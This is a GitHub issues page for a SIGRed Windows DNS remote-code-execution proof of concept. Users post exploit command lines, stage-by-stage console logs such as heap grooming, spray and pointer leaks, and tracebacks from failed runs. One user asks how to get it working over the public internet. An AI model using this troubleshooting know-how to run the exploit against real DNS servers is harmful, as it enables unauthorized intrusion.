
sigred_rce_poc's People

Contributors

chompie1337


sigred_rce_poc's Issues

can't reproduce this exploit in a public network environment

Thank you for helping me successfully reproduce this exploit in an experimental environment. But there are still some problems in the public network environment. I let the DNS server be configured by default and followed your steps. But it doesn't work. Sometimes the heap address couldn't be leaked successfully. And another error has been obtained several times: it seems that after obtaining dns!_imp_exit, the address of msvcrt!exit couldn't be leaked successfully. Spontaneous DNS requests from the server could affect the address assigned by the dns!NsecDNSRecordConvert function, is it? Could you reproduce this exploit over the real internet? I hope to find steps that have been missed.

Thanks!

Setting up over public network

Hello, can you please help me with setting up your script to work over Internet. I've registered my domain evildomain.com and created a glue dns record for it ns1.evildomain.com. And I have one question for you, do I need to setup real DNS on my vps (ns1.evildomain.com) or launching evildns.py is enough for success?

Potential security issue

Hello 👋

I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@jhond0e) has found a potential issue, which I would be eager to share with you.

Could you add a SECURITY.md file with an e-mail address for me to send further details to? GitHub recommends a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.

Looking forward to hearing from you 👍

(cc @huntr-helper)

cannot import system_arg from payload

I am receiving this error after installing payload-api and running evildns.py. I have searched the init file for references to system_arg and every other file in the package but I cannot find the reference to this module. I noticed this is used in a binary concatenation so it is likely just a string, do you have the string or are you able to point me to where to find it?

Getting a crash

Hi,

I'm getting the following when attempting to exploit. Any ideas ?

# python3 exploit.py -ip 10.0.2.100 -d vbsigred.com
[!] grooming small buffer size freelist
Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163
[!] doing DNS record heap spray
[!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering realloc and overflow
[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
Traceback (most recent call last):
  File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 259, in <module>
    main()
  File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 255, in main
    do_rce(args.ip, args.domain)
  File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 117, in do_rce
    hl64_bytes = sigs[11].encode('ascii')
IndexError: list index out of range

Errors

Hi,

Thank you for your effort. However, when I tested this on Kali Linux 2020.4 I get two different errors. Is there anything I can do to fix them?

Thanks!

errors

IndexError: list index out of range

Error

[!] triggering heap ptr leak
Traceback (most recent call last):
  File "/home/jerad/SIGRed_RCE_PoC/exploit.py", line 259, in <module>
    main()
  File "/home/jerad/SIGRed_RCE_PoC/exploit.py", line 255, in main
    do_rce(args.ip, args.domain)
  File "/home/jerad/SIGRed_RCE_PoC/exploit.py", line 117, in do_rce
    hl64_bytes = sigs[11].encode('ascii')
IndexError: list index out of range

heapleak

Heapleakb64 output:

└─$ cat heapleakb64
Server: 172.16.0.97
Address: 172.16.0.97#53

** server can't find 9.dz.evilcorp.local: NXDOMAIN

Network Time: Less than 15 min

OS: Server 2012

DNS Bin: dns.zip (attached)

no response in evildns.py and exploit.py throws exception

heapleakb64:
Non-authoritative answer:
*** Can't find 9.dz.[my_evil_domain]: No answer

[!] grooming small buffer size freelist
Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163
[!] doing DNS record heap spray
[!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering realloc and overflow
[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
Traceback (most recent call last):
  File "exploit.py", line 221, in <module>
    main()
  File "exploit.py", line 217, in main
    do_rce(args.ip, args.domain)
  File "exploit.py", line 96, in do_rce
    hl64_bytes = sigs[11].encode('ascii')
IndexError: list index out of range

unpack requires a buffer of 8 bytes

Running on Kali2021 against Server 2016 without patch

[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
Traceback (most recent call last):
  File "/SIGRed_RCE_PoC-main/exploit2.py", line 260, in <module>
    main()
  File "/SIGRed_RCE_PoC-main/exploit2.py", line 256, in main
    do_rce(args.ip, args.domain)
  File "/SIGRed_RCE_PoC-main/exploit2.py", line 121, in do_rce
    heap_ptr = struct.unpack('<Q', data_bytes[33:41])[0]
struct.error: unpack requires a buffer of 8 bytes

Could not Find msvcrt Offset

Hey @chompie1337, thanks for your hard work.

I've been trying to test this exploit in a closed environment (Server 2016, 1607) and each execution (including a restart) triggers a different error. On most of the cases, it was as previously reported here with the 8-byte error.

The most recent error I had is as follows:
[attached screenshot: WhatsApp Image 2021-08-22 at 12 25 22]

In addition, I changed the network DNS settings of the server to itself only, and set the timeout interval in the Conditional Forwarder setting from 5 to 1, and this is how I actually went further from the other errors.

I can provide the other error log files as well (heapleak, heapleak64 etc).

EDIT:
Based on the logs, and since I do have exitleak (including a manual check that showed the offset does exist in the offset file), I suspect that the file is not parsed properly as it's being written using os.command and not native Python.
In addition, testing "pexit & 0xFFF" returns 0, which is super strange.

Thanks a lot!

List Index Out of range

When trying to exploit this PoC on Windows Server 2008 R2, I got an error about "List Index Out of range".
Please help me; I use Ubuntu 20.04 to exploit.
[attached screenshot]

exploit.py [ struct.error: unpack requires a buffer of 8 bytes]

[!] grooming small buffer size freelist
Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163
[!] doing DNS record heap spray
[!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering realloc and overflow
[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
Traceback (most recent call last):
  File "exploit.py", line 259, in <module>
    main()
  File "exploit.py", line 255, in main
    do_rce(args.ip, args.domain)
  File "exploit.py", line 120, in do_rce
    heap_ptr = struct.unpack('<Q', data_bytes[33:41])[0]
struct.error: unpack requires a buffer of 8 bytes

heapleakb64:

Server:		*.*.*.*
Address:		*.*.*.*#53

Non-authoritative answer:
9.dz.[evildomain]	signature = A 5 0 8192 20250715184655 20190715184655 40452 9.dz.[evildomain]. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA

Authoritative answers can be found from:

Which build version did you use?

I have tried some different versions of Windows Server 2016, 2012, 2012R2, 2008. However, it is not successful. Can you provide some build version of your testbed?

Could not find dns offsets

I am trying the exploit with conditional forwarding.
Output after running exploit.py :
$ sudo python3 exploit.py -ip 192.168.146.136 -d kedar.ee
[!] grooming small buffer size freelist
Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163
[!] doing DNS record heap spray
[!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering realloc and overflow
[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
[+] controllable heap addr: 0x28acd3567d0
[!] waiting for timeout object allocation
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering dns!RR_Free addr leak
[-] Could not find dns offsets!
DNS leak 64 file: dnsleak64 (attached)
Windows version screenshot: [attached image: windows server version]
